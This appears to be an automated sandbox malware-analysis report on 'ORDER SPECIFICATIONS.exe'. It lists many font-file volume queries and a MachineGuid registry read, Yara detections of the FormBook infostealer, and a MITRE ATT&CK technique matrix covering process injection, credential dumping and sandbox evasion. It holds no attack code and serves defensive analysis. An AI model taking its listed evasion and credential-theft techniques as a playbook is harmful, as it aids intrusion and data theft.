Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection612	Masquerading1	OS Credential Dumping	Security Software Discovery331	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion4	LSASS Memory	Virtualization/Sandbox Evasion4	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information41	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
